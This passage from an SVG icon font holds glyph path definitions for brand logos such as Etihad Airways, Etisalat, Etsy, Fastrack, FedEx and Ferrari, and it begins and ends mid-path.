151h83l-19-151z" />
<glyph glyph-name="brand-etihad-airways" horiz-adv-x="1000" unicode="&#xe8cf;" d="M683 151v3c7 0 13 0 19 0v-3c-1 0-2-1-4-1 1-4 4-8 6-12 1 2 2 5 3 7 1 2 1 3 1 5-1 1-2 1-4 1 0 1 0 2 0 3 6 0 11 0 16 0v-3c-2 0-4-1-5-2-2-1-3-3-4-5l-5-9c-1-2-1-4-1-6 1-2 0-4 1-6 2-2 5-1 7-2 0-1 0-2 0-3-8 0-15 0-23 0v3c3 1 7 0 7 4 0 3 1 7-1 10-1 3-3 6-5 10 0 1-1 3-3 4-1 1-3 2-5 2z m108 0c5 5 13 4 18 1l0-10h-3c-1 3-1 7-5 8-2 2-5 0-6-3-1-2 1-4 3-5 3-3 8-4 11-8 3-3 3-10-1-13-3-3-8-4-12-4-3 1-7 1-10 3 0 4-1 8-1 11 1 0 2 0 3 1 1-4 2-7 6-9 2-2 5-2 7-1 3 2 3 5 1 7-4 4-10 5-13 9-3 4-2 10 2 13z m-313 3c5 0 11 0 17 0v-2c-1-1-3-1-4-2-1-1 0-2 0-3 2-5 3-10 5-15 1 5 3 10 5 15 0 3-3 4-5 5 0 0 0 1 0 2l17 0v-2c-1-1-3-1-4-2 0-2 1-3 1-5 1-5 3-9 4-13 2 5 4 11 5 17 0 2-3 2-4 3v2c5 0 10 0 15 0l0-2c-3-1-5-2-6-5l-11-29c-1 0-2 0-3 0-2 8-4 16-7 23-3-7-6-15-8-23l-4 0c-2 9-5 17-7 26-1 2-2 4-3 6 0 1-2 1-4 2l1 2z m-100 1l17 0c4 0 8-1 11-3 4-2 4-8 2-11-1-2-3-3-5-4 4-7 9-14 17-16l0-3c-5 1-11 0-15 3-4 3-6 8-9 12 0 2-2 2-3 2 0-3-1-7 0-10 1-3 5-3 7-3v-3l-22 0v3c2 0 4 0 5 1 1 1 1 3 1 5l1 18c-1 2 0 4-1 5-2 1-4 1-6 1v3m15-4v-12c2 0 4 0 5 1 3 2 3 7 1 9-2 2-4 2-6 2z m-101 4h21l0-3c-2-1-5 0-6-2-1-4-1-7-1-11 0-4 0-9 0-14 1-3 5-2 7-3 0-1 0-2 0-2-8-1-15 0-22 0v2c2 1 4 1 6 2 1 1 1 3 1 4 0 6 0 12 0 18 0 2 0 3-1 5-2 1-4 1-6 1l1 3z m309-3c2 1 4 3 6 4l1 0 12-29c0-2 1-3 2-4 1-1 2-1 4-2v-2c-7 0-13 0-19 0v2c2 1 3 1 5 2-1 3-2 6-3 9h-10c-1-3-3-6-2-9 2-1 4-1 6-2v-2c-6 0-12 0-17 0 0 1 0 1 0 2 1 1 4 1 5 3 3 8 7 17 10 25 1 1 0 2 0 3m-1-15h7l-3 8c-2-3-3-6-4-8z m-391 20h2l11-29c0-1 1-3 2-4 1-1 2-1 4-2l0-2c-6-1-12 0-19 0v2c2 1 4 1 5 2-1 3-2 6-3 9-3 0-7 0-10 0-1-3-3-6-1-9 1-1 3-1 5-2v-2h-17v2c2 1 4 1 5 3l10 25c1 1 1 2 1 3 2 1 3 2 5 4m-3-12c-1-2-2-5-3-7 2-1 4-1 6 0-1 2-2 5-3 7h0z m359 72l90 93c6-7 12-13 18-20-25-27-51-53-77-79l5-1c0-2 0-4 0-6-16 0-32 0-48 1 4 4 8 8 12 12z m221 115c34 0 68 0 102 0 14 0 28 0 43-2 11-2 22-5 32-10 9-5 17-11 24-19 7-8 11-18 13-28 1-11-1-22-6-31-5-9-12-15-20-21-11-7-23-12-35-14-13-3-27-3-40-3-31 0-63 0-94 0 0 2 0 3 0 5 2 1 6 2 5 5 0 31 0 62 0 93 11 0 22 0 32 0l0-82c19 0 38 0 56 0 12 0 25 1 36 4 9 3 18 8 24 16 9 10 11 25 5 37-4 10-13 17-22 22-12 5-25 6-37 6-38 0-76 0-113 1 0 4 0 9 0 13l-5 3 0 5z m-128-19c6 7 13 13 19 20l122-129-48 0c0 2 0 4 0 6 2 0 4 0 5 0-12 14-25 27-37 40-1 1-1 2-3 2-19 0-39 0-58 0-3 0-5-2-8-3-2 1-3 2-5 3l15 16c1 1 3 3 5 5 10 0 21 0 32 0-8 8-16 16-24 24-5 6-10 11-15 16z m-237 20c15 0 29 0 43 0v-5c-2-2-4-2-5-4-1-19 0-38 0-57 5 7 10 14 16 20 12 1 24 0 36 0 15 0 31 0 47 0-1 12 0 25 0 37l-6 3v5c14 0 29 0 43 0 0-2 0-3 0-5-2-1-4-2-5-3-1-1 0-2 0-3 0-23 0-47 0-70-11-11-22-23-33-34l1 48c-12 1-24 0-36 1-17-1-34 0-51 0-4-1-7-4-10-5-1 0-2 0-2 1 0-17 0-33 0-49l5-4v-5c-14 0-29 0-43 1 0 1 0 3 0 4 2 2 5 3 5 6 0 36 0 73 0 110-1 1-3 2-5 3v5z m-52 0c14 0 29 0 43 0 0-2 0-3 0-5-2-2-6-2-5-6 0-36 0-73 0-109l5-3v-5c-15 0-29 0-43 0v5c2 1 4 2 5 4 1 16 0 32 1 48 0 21 0 42 0 62-2 2-4 3-6 4l0 5z m-220-24c7 8 13 16 20 24 64 0 129 0 194 0-7-8-14-17-21-25-1-2-4-1-6-1l0 4c-15 1-29 0-44 0h-22c0-32 0-65 0-98 2-1 3-2 5-3v-5l-43 0v5c2 1 4 2 6 4 0 2 0 4 0 6 0 30 0 61 0 91l-71 1c-5 0-8-4-12-5-2 1-4 1-6 2z m-82 22c11 3 22 2 34 3l58-1-22-25c-2 0-3 0-5 0 0 1 0 2 0 3-1 1-3 1-4 1-10 0-19 0-28 0-7-1-13 0-20-1-13-2-26-6-35-15-8-8-13-19-11-30 5 6 9 14 14 20l55 0c13 0 25 0 38 0 14 0 28 0 42 0l-21-26c-2 0-4 0-6 0l1 4c-3 1-6 1-9 1l-114 0c1-9 5-18 12-23 9-8 21-12 32-13 16-3 32-2 49-2 21 0 43 0 65 0 4 0 6 3 10 4 2 0 5 0 8 0-8-8-15-17-22-26-24 0-48 0-72 0-16 0-31 0-47 2-12 2-25 6-36 12-9 5-18 11-24 19-12 17-12 42 0 59 6 9 14 16 23 22 11 6 22 11 35 12z m167 208c4-3 8-8 11-12 4-3 7-8 12-9 1-3 1-5-1-7-2-2-5-3-6-5-1-2-1-5-1-7h103c3 0 7 0 10-3 3-2 4-6 4-10 0-2-1-4-1-6v-60c0-2 1-4-1-6-4-9-13-14-22-15-9-2-18-1-26 4-4 2-7 6-9 11 0 1 0 2 0 3 0 5 0 9 0 14-24 0-48 0-72 0v20h84c1-9 0-17 1-26 2-5 6-8 11-9 3 0 7 0 10 2 3 2 4 6 4 9l0 47c0 5-5 7-9 7l-102 0c0 19 0 39 0 58z m326 11l14 14c5-5 10-9 15-15-5-4-10-9-15-14-5 4-9 9-14 13 0 1-1 2 0 2z m-18 14c1 1 2 0 2-1 4-4 9-9 14-13-2-2-4-4-6-6-3-3-6-6-9-9l-1 0c-5 5-9 10-14 15 5 4 10 9 14 14z m67 13c1 0 2 1 3 0 5-7 11-14 17-19 2-2 5-3 5-6 1-3-3-5-5-7-4-2-4-7-4-10 0-23 0-47 0-70 7-7 14-14 21-22 7 7 14 14 21 21 0 1 0 2 0 3 0 21 1 43 0 64 0 4 1 8-1 12-2 3-6 3-7 7 0 2-1 4 1 5 3 2 6 5 9 8 4 5 8 9 12 14 0 0 1 0 2 0 0-40 0-80 0-120-5-6-11-12-17-18-2-3-5-6-8-9 7-7 14-13 21-20-11-11-22-22-33-33l-33 33c7 7 14 13 21 20-8 9-17 16-25 25 0 1 0 3 0 4l0 118m23-167c5-5 10-10 14-15 5 5 10 10 15 15l-15 14c-5-4-9-9-14-14z m79 173c4-7 9-12 14-16 5-4 9-8 15-11 2-1 1-4 1-5-2-4-6-4-9-7-2-3-2-8-2-12 0-33 0-67 0-101-6 0-13 0-19 0v105l0 47z m-317-18c6 5 12 10 16 17 0-33 0-65 0-98 0-11 0-22 0-34 37 0 74 0 112 0 0 3 0 6 0 9 0 4-3 8-7 10-5 3-12 3-19 3-11 0-23 0-34 0-2 0-5 0-7 1-5 1-7 6-8 10-1 4-1 8 1 11 1 2 3 3 4 4 3-5 9-6 14-7 14-1 29 0 44 0 9 0 18-3 24-10 7-8 9-20 8-31h30c0 13 0 27-1 40 0 3-1 6-3 8-3 1-6 2-7 5 0 2-1 5 2 5 4 2 7 5 11 8 6 6 12 12 16 19 0-35 0-69 0-104-16 0-32 0-49 0 0-5 1-11 3-16 1-2 3-4 4-5-4-3-9-5-14-4-4 1-8 3-10 7-3 6-3 12-2 18-44 0-87 0-130 0-1 35 0 70-1 105 0 3-1 6-3 8-2 2-6 2-8 5 0 2-1 6 2 6 4 3 8 6 12 10z" />
<glyph glyph-name="brand-etisalat" horiz-adv-x="1000" unicode="&#xe8d0;" d="M106 271h-46c-18 0-35 8-38 31l72 8c17 1 25 11 21 26-6 24-27 40-53 40-36 0-62-25-62-61 0-43 27-64 59-64h58v9c0 6-4 11-11 11z m-44 86c15 0 27-7 31-18 2-3 2-7 0-9-2-2-6-3-12-4-3 0-59-7-59-7 0 23 16 38 40 38z m157 9v-116l22 1v125h-12c-9 0-10-5-10-10z m-31-97v0c-17 0-23 1-23 13v74h19c7 0 12 3 12 10 0 7-5 10-12 10h-19v33h-9c-2 0-3 0-5 0-8-1-8-9-8-9v-24h-5c-7 0-12-3-12-10 0-7 5-10 12-10h5v-79c0-26 19-27 45-27h12v9c0 6-4 10-12 10z m50 119c3 2 3 6 3 10v11h-12c-9 0-10-5-10-9v-15h8c6 1 8 0 11 3z m485-119c-17 0-23 1-23 13v74h19c7 0 12 3 12 10 0 7-5 10-12 10h-19v33h-9c-2 0-3 0-5 0-9-1-8-9-8-9v-24h-6c-6 0-11-3-11-10 0-7 5-10 11-10h6v-79c0-26 19-26 44-26h13v8c0 6-5 10-12 10z m-112 107h-46c-7 0-12-3-12-10 0-7 5-10 12-10h42c15 0 20-4 20-14v-3c-1-7-8-8-11-9-31-7-72 0-72-43 0-23 20-37 48-37 0 0 27-2 37 12v-1c0-7 4-11 11-11h9l0 82c0 22-6 44-38 44z m16-80c0-22-12-29-32-29-18 0-29 6-29 21 0 11 9 18 20 20 11 2 28 3 41 6v-18z m-111 114c-11 0-10-9-10-9v-151h22l0 160h-12z m-175-89l-38 7c-6 1-12 2-15 5-2 1-3 3-3 5-1 6 0 17 11 18h50c7 0 12 3 12 10 0 7-5 10-12 10h-50c-26 0-34-21-33-40 1-13 10-23 29-27l39-6c13-2 16-6 16-16 0-10-5-16-25-16h-50c-7 0-12-4-12-10v-11h64c27 0 45 11 45 39 0 18-8 29-28 32z m106 55h-46c-7 0-12-3-12-10 0-7 5-10 12-10h42c15 0 20-4 20-14v-3c-1-7-8-8-12-9-30-7-71 0-71-43 0-23 20-37 47-37 1 0 28-2 38 12v-1c0-7 4-11 11-11h9l0 82c0 22-6 44-38 44z m-16-109c-19 0-29 6-29 21 0 11 9 18 20 20 11 2 28 3 41 6v-18c0-22-12-29-32-29z m563 89c-5 9-11 16-18 23-9 9-18 17-29 24-8 6-16 11-25 17-17 9-35 18-54 25-12 4-24 8-37 11-10 2-21 3-31 2-10-1-20-4-28-11-1-1-1-2-2-2l-1-2c-4-5-6-11-7-16-2-12-1-23 2-34 3-17 8-33 14-50 6-17 12-34 18-52 5-14 9-28 12-42 1-7 3-8 9-5 9 3 19 7 28 10 14 5 29 9 44 13 19 6 37 11 56 18 13 4 25 10 36 18 7 5 12 10 16 18 1 2 1 3 2 5 0 1 1 3 1 5 1 9-2 17-6 25z m-82-38c-6-7-13-11-21-16-8-5-17-9-26-12-7-2-13-3-20-3-9-1-15 3-19 11-6 10-9 21-11 32-2 8-3 15-3 23 0 7 0 14 3 21 4 10 12 15 22 17 13 2 24-1 36-5 11-4 21-10 29-18 9-7 15-16 17-27 2-9-1-17-7-23z" />
<glyph glyph-name="brand-etsy" horiz-adv-x="1000" unicode="&#xe8d1;" d="M281 286c-16-35-38-38-63-38h-74c-25 0-37 10-37 31v114s54 0 73-2c14-1 23-5 27-24l6-26h21l-1 65 3 66h-22l-7-29c-4-19-7-22-26-25-22-2-74-2-74-2v134c0 5 1 8 9 8h114c20 0 31-17 39-49l6-25h19c4 72 7 103 7 103s-49-5-78-5h-145l-78 2v-21l26-5c19-3 23-7 25-24 0 0 1-50 1-132 0-81-1-131-1-131 0-14-6-20-25-23l-26-5v-21l78 2h130c29 0 97-2 97-2 2 18 12 99 13 108h-18l-19-44z m176-38c-22 0-34 15-34 52v135l73-6 4 34-77-3v76l-21 0c-7-31-14-55-39-70-14-10-30-14-35-14v-19h44v-153c0-42 28-63 66-63 29 0 59 12 70 38l-11 14c-4-9-20-21-40-21z m126 170c0 23 21 32 44 32 18 0 33-6 36-15l12-38 18 1c2 20 3 43 6 61-16 7-49 11-70 11-49 0-88-21-88-69 0-82 122-66 122-127 0-22-13-37-44-37-27 0-41 15-47 29l-14 36-18-1c1-11 1-25 1-38 0-13 0-25-1-31 0 0 37-14 76-14 51 0 92 24 92 73 0 84-125 71-125 127z m370 43l-51 3v-17l13-4c13-4 19-9 19-18 0-5-2-9-4-16-6-16-40-99-58-138-22 54-51 133-55 147-1 3-2 6-2 8 0 8 5 15 17 17l17 4v17l-68-2-54 2v-17l9-3c12-4 15-8 22-25 41-92 60-143 85-208-25-53-54-68-81-68-14 0-20 6-22 16l-8 38-20-1c-4-23-8-48-14-69 13-9 34-14 50-14 34 0 86 4 134 117l80 188c6 16 9 17 27 25l11 4v17l-47-3z" />
<glyph glyph-name="brand-fastrack" horiz-adv-x="1000" unicode="&#xe8d2;" d="M137-57c77 19 126 66 141 144 12 67-12 123-65 163-69 52-141 48-213 3 34 49 85 68 139 69 114 3 201 59 278 135 76 74 145 155 222 227 106 98 256 97 361 4-54 24-110 34-168 19-59-15-105-48-138-100-53-83-47-191 15-265 59-71 162-116 289-59-49-50-109-60-170-69-82-11-164-19-245-36-117-24-213-87-295-172-50-52-90-67-151-63z" />
<glyph glyph-name="brand-fedex" horiz-adv-x="1000" unicode="&#xe8d3;" d="M588 281v53h85v57h-85v38h85v60h-148v-268h148v60z m315 110h-76l-37-41-37 41h-80l76-85-76-85h78l36 42 37-42h80l-76 85z m65-112c-17 0-32-13-32-31s15-32 32-32 32 13 32 32-15 31-32 31z m0-58c-15 0-26 11-26 26 0 16 11 27 26 27s26-11 26-27c0-15-11-26-26-26z m7 27v0c4 1 6 4 6 9 0 7-3 10-12 10h-14v-38h6v17h6c4 0 5-1 6-4 1-5 1-10 3-13h6c-1 1-2 7-2 10-1 6-2 9-5 9z m-7 3h-7v11h7c6 0 7-2 7-5 0-3-1-6-7-6z m-506 128h0c-14 16-31 22-52 22-41 0-72-28-83-65-12 40-44 65-91 65-39 0-69-17-85-45v35h-80v38h87v59h-158v-267h71v113h71c-2-9-3-18-3-27 0-56 42-95 97-95 45 0 76 22 91 61h-60c-9-12-15-15-31-15-19 0-36 16-36 36h124c6-44 40-83 87-83 21 0 39 10 51 27h1v-17h62v268h-63v-110z m-260-46c4 17 17 28 34 28 18 0 30-11 34-28h-68z m222-71c-23 0-37 21-37 44 0 24 13 47 37 47 26 0 37-23 37-47 0-23-11-44-37-44z" />
<glyph glyph-name="brand-ferrari" horiz-adv-x="1000" unicode="&#xe8d4;" d="M499 823c2 0 345-64 361-67l0 20-361 69-360-68c0-6 0-13 0-20 2 0 349 65 360 66z m360-176l0 27 0 1c0 20 0 40 0 61l-360 65-359-65v-12c0-16 0-32 1-49h0c0-44 1-89 1-125l1-24c0-11 0-21 1-31 0-8 0-15 0-23 1-5 1-10 1-15 0-7 1-14 1-21 1-3 1-6 1-9 1-15 3-29 5-43 3-15 6-31 9-46 11-47 26-94 44-138 20-49 46-101 77-144 7-9 13-17 19-25 23-30 47-57 74-83 9-8 17-15 26-23 10-8 21-16 32-24 10-8 21-15 32-22 6-4 11-8 17-12l19-12c0 0 1 0 1 1l19 12c7 5 14 10 22 15 30 21 57 43 84 68 14 13 28 26 40 40 36 40 67 84 93 131 9 17 18 35 26 53 4 7 7 14 10 21 11 26 20 52 28 79 3 9 5 17 7 26 4 16 8 33 11 50 3 14 5 29 8 43 9 60 9 141 9 253z m-15-176c-2-50-6-83-17-136-2-9-12-46-14-55-3-9-18-53-21-62-33-85-79-160-142-227-6-6-34-33-40-39-5-4-53-42-58-45-8-5-23-15-38-24l-15-10-17 11c-11 8-30 20-43 28-3 3-48 39-53 43-8 8-32 32-38 38-4 4-45 53-48 58-5 7-31 45-36 53-37 62-61 122-80 192-4 12-11 43-13 53-6 29-11 66-13 96-1 12-1 22-2 35-1 48-3 185-3 185s0 0 1 0c229 104 465 104 694-2l0 0c0 0 0-1 0-2 0-3-3-177-4-190z m-117-55c-2-4-3-10-7-16-5-8-13-18-16-18-2 0-3 5-3 5s-3 7 2 17c3 7 5 9 9 14 3 5 6 8 8 13 3 5 3 6 5 13 0 2-1 5-2 5-3 0-9-14-16-21-6-7-18-17-18-17s-1 0-1 2c0 2-1 8 1 13 1 5 3 11 7 19 6 10 13 16 16 20 2 1 6 4 4 5-2 1-8-4-13-7-5-4-7-6-13-13-6-6-8-9-8-9s-5-9-6-18c-2-9-2-13-2-13s0-8 1-13c0-5 2-12 2-12s3-9 4-14c1-5 3-20 3-20s2-11 1-22c-1-10-2-16-3-19-1-3-5-12-10-17-5-6-5-7-5-7s-6-4-10-6c-4-3-11-6-14-6-2-1-6-1-7-1l-3 0c-1 0-1 0-2 1 0 0 0 2 0 2s-3 11-6 19c-3 6-9 14-9 14s-10 14-18 22c-9 9-20 16-26 21-2 2-8 5-8 5s-21 21-28 37c-5 12-9 20-8 33 1 3 2 8 2 8 1 0 4-1 4-1 1 0 4-3 7-4 2-1 5-1 5-1s3 0 4-1c1 0 4-1 6-2 2-1 4-3 4-3s5-3 5-3c1-1 5-5 5-5s3-2 4-2c1 0 1-1 2-1h1s1 1 1 2c0 1-1 0-4 3-3 3-4 5-4 5s-1 2-3 5c-2 2-5 4-5 4s-2 2-5 3c-3 0-4 1-4 2 0 1 4 0 4 0s4 0 7-2c4-2 6-4 6-4l2-1 2-2 1-1s2-1 2 1c0 2 0 3 0 3s-2 2-2 2l-6 5c-1 1-2 3-4 4-2 1-4 3-8 4-2 1-4 1-7 2-2 1-4 2-5 3 0 1-2 2 1 1 3 0 4-1 7-2 5-1 8-1 12-3 2 0 4-2 4-2l6-2s7-4 12-4c6 0 10 1 12 2 1 0 5 2 5 3 1 1 2 2 2 2s0 0 0 1c0 0 0 1 0 1-1 2-4-3-9-4-5-1-5-1-8-1-3 1-5 2-8 4-4 4-6 8-12 11-3 1-7 3-7 3s-7 1-10 4c-3 1-8 2-6 4 0 1 7-3 12-3 4-1 7-1 10 0 3 0 7 0 7 0 1 1 3 0 5 0 2 0 3-1 5-2 2-1 4-2 5-2 0 0 1 0 1 0s1 0 1 0l0 1 0 1-1 0-2 2s-3 1-5 3c-2 3-4 5-8 6-3 1-7 2-7 2l-4 0-1 0s-3 1-1 2c2 0 3 1 4 1 0 0 4 0 6-1 3 0 7-2 7-2 0-1 4-3 7-4 4-1 9-1 9-1s2 0 2 0c1 0 1 1 1 1s1 0 1 0c0 1 0 2 0 2s0 1-2 1c-2 1-5 1-8 4l-6 4s-2 2-6 3c-5 1-6 2-6 2l-2 0-3 1s-1 1-2 3c-1 1-3 4 2 2 4-2 6-2 6-2s2-3 4-3c2 0 3-1 4 0 1 2-3 4-6 6-2 1-4 5-4 5s-2 1 1 0c2 0 7-3 7-3s2-1 3-1c1-1 3-2 4-2 1-1 4-1 6-2 2-2 3-4 4-5 1-1 2-2 4-2 1-1 2-1 3-1 1 1 1 1 1 1s0 1-1 2l-4 3 0 1-1 1-1 2-3 4s-4 6-7 7c-4 2-6 3-6 3s-2 1-3 2c-1 1-2 2-3 3-1 2-2 3-4 5-3 3-13 5-9 7 2 1 5 1 6 0 1 0 4-1 6-2l5-1c2 0 4-1 5-1 0-1 1-2 2-2 0 0 2-4 7-6 4-2 5-3 10-4 3 0 8 1 8 1s1 1 0 2c-1 2-1 2-3 2-4 2-8 1-11 5-2 1-2 2-3 4-1 2-1 3-2 4 0 2-2 4-2 4s-4 5-9 8c-5 2-8 5-9 5-1 1-2 3-2 3s-2 2-2 3c0 0-1 1-1 1 0 4 5-1 9-2 5-1 7-3 13-5 2-1 4-1 7-2 5-2 6-7 12-8 3 0 8-1 7 1-1 3-7 3-10 7l-2 4c-3 3-8 6-8 6s-2 1-4 5c-2 4-6 7-13 11-6 2-16 3-12 6 3 1 5 1 8 0 3-1 4-2 7-4 2-1 3-1 4-1 0-1 3-2 3-2 1 0 5-1 6-1 1 0 6-1 6-1l5-2s2-1 4-1c1 0 3 1 3 1l2 1 0 1s1 1-1 1c-2 1-3 1-3 1-1 0-2 0-2 0-1 0-1 1-1 1s-4 3-8 4c-3 2-4 2-4 2s-1 0-2 1c0 0-1 0-1 0s-2 0-4 2c-2 2-3 3-5 5l-3 3s-2 1-2 3c0 2 5-3 5-3l4-2s2-2 8-2c5 0 11 1 11 1s1 1 4 0 5-3 5-3l2-1s4-4 4-4 0 0 1 0c0 0 1 2-1 5l-7 6s-6 3-12 5l-8 1s-4 0-7 3c-2 3-4 5-4 5l-2 2s-2 1-4 3c-3 1-6 2-6 2s-4 2-5 4c0 3 7 0 12-1 4-1 6-3 10-3 3-1 5-1 9-1 2 0 3 0 5 0 2 0 4 1 6 0 3 0 4-2 7-3 1-1 2-2 4-2 2 0 5-1 5 0 0 1-1 1-1 1-1 2-3 3-5 4-4 3-5 5-10 7-2 2-4 2-7 3-3 0-4 0-7 0-2 1-3 2-5 4-5 2-7 4-11 6-3 1-8 2-8 2l-2 0s0 1-1 1c-4 1 7 4 13 6 2 0 3 1 6 1 2-1 5-4 7-2 4 2-4 7-7 8-3 1-9 0-9 0l-13 1-4 0s-2 0-4 2c-2 2-8 10-16 11-8 1-10 0-11 1-6 10-13 12-18 17-2 2-4 5-5 5 0-1-1-5-3-9-1-4 0-6 1-8 1-1 2-3-1-4-2-2-6-2-6-2s-3 1-6 2l-8 4s-5 1-9 1c-3 0-3 0-6-1-1 0-2 0-3 0-1-1-3 0-3-1 0-1 3-2 5-2 2-1 7-1 6-2-1-1-6-2-6-1 0 0-3 0-5 0-4 0-4 0-10-3 0 0 0-2 1-2 2 1 5 2 8 1 4 0 6-1 9-2 3 0 4-1 8-2 1 0 2 1 2 0 0-1-1-1-1-1s-3-1-2-2c0-1 3 0 4 0 1 0 3 0 3-1-1-1-1-1-1-1-3-1-5-2-8-3-7-3-10-6-17-10-7-3-17-7-17-7s-4-2-8-3c-5-1-5-1-8-1-4 0-5-1-8-2-1-1-2-2-4-3l-4-6-2-4c-1-1-1-2-2-3 0-1-1-2-1-3-1-4 0-6 1-9 0-1 0-2 0-2 0-1 2-2 2-2l1-1s4 1 7 1c2 1 6 2 6 2s4 1 4 1c1 0 4 1 4 1s2 0 2-1c0-1-1-2-1-2s-1-1-3-1c-1-1-5-2-5-2 0 0-4-1-4-1l-2-1s-1 0-1-1c-1-1-1-1-1-1 1-1 1-1 2-2 1-1 1-1 3-2 2 0 3 0 5 0 3 0 5 0 7 1 2 2 3 2 6 3 1 0 3 1 4 1 5 0 8-1 14-2l13-3c6-1 9-3 15-1 3 0 5 1 6-1 2-3 2-4 2-4s0-2-3-7l-8-19-4-9s-4-7-12-16c-8-9-8-9-8-9s-4-3-9-9c-4-5-4-7-8-11-3-3-4-4-7-6-4-2-7-2-17-8-9-6-13-11-14-11-1 0-4 3-5 3-1 1-17 12-17 12l-7 5-3 2-1 0-2 3s-2 3-5 5-7 6-12 7c-5 1-8 2-13 0-3 0-5-2-7-4-3-3-4-5-6-9-3-3-5-6-6-8-1-2-4-6-4-6s-5-10-9-16l-8-17c-6-10-13-20-15-25-2-4-3-5-3-5s0-3 0-4c-1-2-1-5-1-6 0-1-1-3-1-3s-4-7-5-11c-1-5-4-18 0-20 3-2 26 8 29 18 2 7-6 10-4 15 1 2 2 3 3 5 2 3 1 11 6 18 3 6 9 12 18 22 5 6 11 16 11 16s1 4 3 3c3-1 5 0 5 0s1-1 1-1c0-1 2-3 2-3l4-5s6-8 7-11c2-2 5-3 7-6 3-3 4-4 8-7 6-5 4-7-3-3-3 2-7 3-10 4-3 1-17 4-23 5-7 1-7 1-7 1s-4 0-7-2l-6-4s-4-5-5-6c0-1-2-4-2-4s-1-2-2-4c0-2 0-4 0-4l0-5 1-4s0-10 3-20c0-3 1-8 1-8l1-10s1-11 2-14c1-4 1-4 2-7 1-4-1-6 1-11 2-5 4-5 6-8 1-2 2-2 3-6 1-2 5-12 9-19 5-7 11-16 15-15 4 1 7 7 7 7s5 12 2 24c-3 13-17 7-18 16 0 2 0 5 0 5s-1 4-1 5c-1 1-5 10-7 17-1 5-1 23-2 28-4 12-4 11-2 13 2 3 4 2 4 2s2 0 2 0c0 0 2-1 2-1s2-1 4-2l5-4 9-7s6-3 8-4c3-1 5-2 5-2l2-2 5-3s0-1 1-1c0-1 0-1 0-1s2-5 11-10c7-4 13-3 16-6 0-1 5-7 7-11 3-5 7-10 8-12 1-2 8-11 8-11l10-10 12-11 11-10 7-6s7-6 14-11c7-4 7-5 12-8 3-2 8-5 12-9 5-3 10-10 8-13-1-1-4 3-9 7-4 4-6 6-10 9-5 4-8 6-14 9-3 2-8 5-8 5-2-7-2-12-1-20 0-5 1-10 2-17 2-6 3-9 6-15l6-16 7-13 6-10 3-6 1-1s2-4 0-6-3-7-6-7-8-1-8-1l-34 0-18 2s-2 1-13 1c-6 0-11-3-14-3-3 0-17 1-26-3-9-4-14-5-17-10-2-4 12-11 23-14 18-4 13 4 20 9 1 0 1 1 2 1 5 2 7-2 12-2 5 0 8 2 13 2 26 4 67-8 67-8s10-4 15-3c5 2 4 3 6 7 1 2 1 3 1 6 0 1 0 2-1 4-1 5-4 12-4 12s-2 5-3 7c-1 4-2 6-3 10-1 11-1 10-1 16 0 11 1 17 4 28 4 15 12 22 18 37 2 4 2 10 4 10 2 0 2-7 1-11-4-15-13-22-17-37-3-12-5-19-4-31 0-7 3-17 3-17s3-11 5-16l5-11 8-14 4-7s3-2 1-7c-1-4-4-6-7-10-10-12-33-29-39-33-8-6-7-8-8-10-3-9-12-9-23-20-2-2-8-9-7-14 1-2 26-6 40 0 11 5 2 10 5 16 2 4 8 4 10 7 5 6 2 5 6 10 12 15 20 24 42 37 2 1 6 3 6 3s3 1 4 3c2 3 1 5 1 7 0 2 0 3 0 5 0 2 0 3 0 5-1 3-3 6-4 7-1 2-3 4-4 10-2 5-2 10 0 16l8 11 13 9s11 8 15 11c3 3 11 10 16 17 6 8 9 14 12 24 1 3 1 9 1 9s0 4 2 4c3 1 3 0 3 0s2-1 3-7c0-6-2-12-2-12s-2-7-2-11c0-3 0-4 0-7 0-5 2-9 2-9s1 0 1 2c0 2 0 5 1 9 1 3 2 2 3 7 2 7 0 6 2 10 1 1 2 3 3 3 2 0 2-2 2-2s2-8 1-15c-2-7-7-16-7-16l-4-7s-3-5-4-8c-1-4-2-5-1-8 1-3 4-8 5-7 1 0-2 3 2 10 3 7 8 12 8 12s6 7 9 13c3 5 5 13 5 13s2 8 2 14c-1 6-2 9-2 9s-2 4-2 5-2 3-2 3c0 1 0 2 1 2 1 1 3-1 4-3 2-2 4-5 5-9 1-3 1-6 1-8 0-2-1-12 3-18 1-3 5-10 5-7 0 7-2 10-2 16 0 7 2 5 2 9 1 3 2 4 1 9l-2 11s-2 4-2 5c0 0-1 1-1 1s1 1 1 1c1 0 7 3 7 3s9 4 13 6c3 3 8 8 8 8s6 7 8 12c7 13 7 30 7 37 0 7-2 17-2 17s-2 11-2 19c1 7 1 11 1 11s0 7 6 15c7 8 9 14 11 19 0 6-2 14-5 11z m-176 102c-2 0-4 2-4 2s-1 1 1 2c1 1 4 0 4 0s0 0 1 0c1-1 3-3 3-4 0-2-4 0-5 0z m1 12c-2 0-5 2-5 2s-1 1 1 2l5 1s1 0 1-1 4-3 4-5c0-2-4 0-6 1z m2 13c-3 0-6 3-6 3s-1 1 1 2c3 1 6 1 6 1s1-1 2-1c1-1 3-4 4-6 0-2-5 1-7 1z m-2 53c-1 1-4 2-4 2s0 1 1 2c2 1 4 0 4 0s1 0 2 0 3-3 3-4c0-1-4 0-6 0z m7-13c0-1-4 1-6 1-2 0-4 2-4 2s-1 1 1 2l4 0s1 0 2 0c0-1 2-3 3-5z m-9-21c2 1 5 1 5 1s1-1 1-1 4-4 4-5c0-2-4 0-6 1l-5 2s-1 1 1 2z m4 10c-2 0-5 2-5 2s0 1 1 2c2 2 5 1 5 1s1 0 2-1c1-1 3-3 3-5 0-1-4 0-6 1z m4 43c2-1 3-2 1-2-1 0-1 0-2 0-3 0-3 1-6-1-3-2-1-1-6-3l-3 3s0 1 1 3 3 1 5 1c4 0 7 0 10-1z m-17 17c2 1 4 1 4 1s1 0 1-1c1 0 3-3 3-4 0-1-3 0-5 1-2 0-4 2-4 2s0 1 1 1z m-125-35l-2-1c-2-2-3-4-4-4-1 1-1 4-1 4s1 3 2 5l3 3c2 0 5-2 5-4s-2-2-3-3z m24-9s-1 0-2 2c0 2 2 2 2 2s3 2 3 0c0-2-3-4-3-4z m31 40s-4-7-9-9c-5-2-9-3-19-4-1 0-1 1-1 1s12 3 18 6c4 2 8 5 9 6 4 3 2 0 2 0z m42-39c1 2 0-2 0-2s0-4-2-5c-3-1-9-3-10-2 0 1 8 3 12 9z m-18 44s1 0 3-1c2-1 3-5 3-5s0-1-1-1c-1 0-1 2-2 3-1 1-2 1-3 1-2 1-4 0-4 2 0 1 4 1 4 1z m-13-10s1 2 3 3l6 2s1 0 4-2c2-1 3-6 3-6s1-3-1-4c-1-2-3 1-5 2-1 2-2 2-4 3-2 1-5-2-6 0 0 